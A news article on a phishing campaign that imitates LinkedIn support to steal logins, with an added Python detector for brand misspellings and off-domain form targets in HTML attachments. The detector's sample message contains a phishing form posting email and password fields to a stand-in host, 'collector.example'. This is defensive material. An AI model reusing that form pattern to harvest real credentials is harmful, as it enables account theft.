Cybercriminals are now targeting LinkedIn users, sending emails that claim to come from the professional networking site's support team in order to trick them into sharing their credentials, according to security software firm Symantec.
Founded in 2003, LinkedIn has over 300 million members globally and nearly 26 million in India. Security firm Symantec says that it has observed an increase in phishing emails claiming to be from the US-based firm's support team over the last week. The emails spell LinkedIn with a lowercase 'i' instead of the capital 'I', a difference that an ordinary user may not notice.
"The body of the email claims that irregular activities have prompted a 'compulsory security update' for the recipients' LinkedIn account," Symantec said. "However, the website's source has been modified, so if the recipient uses this web page to sign in to their LinkedIn account, their credentials will be sent directly to the attacker," Symantec warned.
"The difference in characters is indiscernible to the eye and functions as a way to evade mail filters. Also, the HTML attachment method bypasses browser blacklists that often flag suspicious websites to help prevent users from being phished," Symantec said.
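The two traits Symantec describes, a brand name spelled with the wrong letter case and an HTML attachment whose sign-in form submits somewhere other than LinkedIn, can both be checked at a mail gateway. The following is an added example, not code from Symantec or from the original article; the sample message, the `example` hostnames, the form field names and all function names are constructed for illustration.

```python
import re
from email import message_from_string
from html.parser import HTMLParser
from urllib.parse import urlparse

BRAND, BRAND_DOMAIN = "LinkedIn", "linkedin.com"

# Constructed sample message (not taken from the real campaign).
SAMPLE = """\
From: "Linkedin Support" <support@mailer.example>
Subject: Compulsory security update
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="b1"

--b1
Content-Type: text/html
Content-Disposition: attachment; filename="update.html"

<form action="https://collector.example/login" method="post">
<input name="email"><input name="password" type="password"></form>
--b1--
"""

class FormActions(HTMLParser):
    """Collect the action URL of every <form> in an HTML document."""
    def __init__(self):
        super().__init__()
        self.actions = []
    def handle_starttag(self, tag, attrs):
        if tag == "form":
            self.actions.append(dict(attrs).get("action") or "")

def misspelled_brand(text):
    """Brand mentions whose letter case differs from the official spelling."""
    return [m for m in re.findall(BRAND, text or "", flags=re.I) if m != BRAND]

def off_brand_host(url):
    """True unless the URL's host is the brand domain or a subdomain of it."""
    host = (urlparse(url).hostname or "").lower()
    return not (host == BRAND_DOMAIN or host.endswith("." + BRAND_DOMAIN))

def inspect(raw):
    """Return findings for brand misspellings and off-brand form targets."""
    msg = message_from_string(raw)
    findings = [f"{h} spells the brand as {m!r}"
                for h in ("From", "Subject") for m in misspelled_brand(msg.get(h))]
    for part in msg.walk():
        if part.get_content_type() != "text/html" or not part.get_filename():
            continue  # only HTML files sent as attachments are inspected
        parser = FormActions()
        parser.feed(part.get_payload(decode=True).decode("utf-8", "replace"))
        findings += [f"{part.get_filename()}: form posts to {urlparse(a).hostname}"
                     for a in parser.actions if off_brand_host(a)]
    return findings
```
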
Symantec has asked LinkedIn users to use two-step verification as this will prevent an attacker from accessing the account even if a user's credentials are compromised. Users should never click on links or download attachments from suspicious or unknown accounts and they should contact LinkedIn immediately if they are attacked.
Microsoft users recently faced similar issues, receiving fraudulent calls from hackers pretending to be from the company's tech support team. The hackers asked the users to download a program, which the criminals then used to obtain financial data or even to gain remote access and demand ransom. Microsoft has filed a lawsuit against an Indian company as well as several others for the fraudulent activities.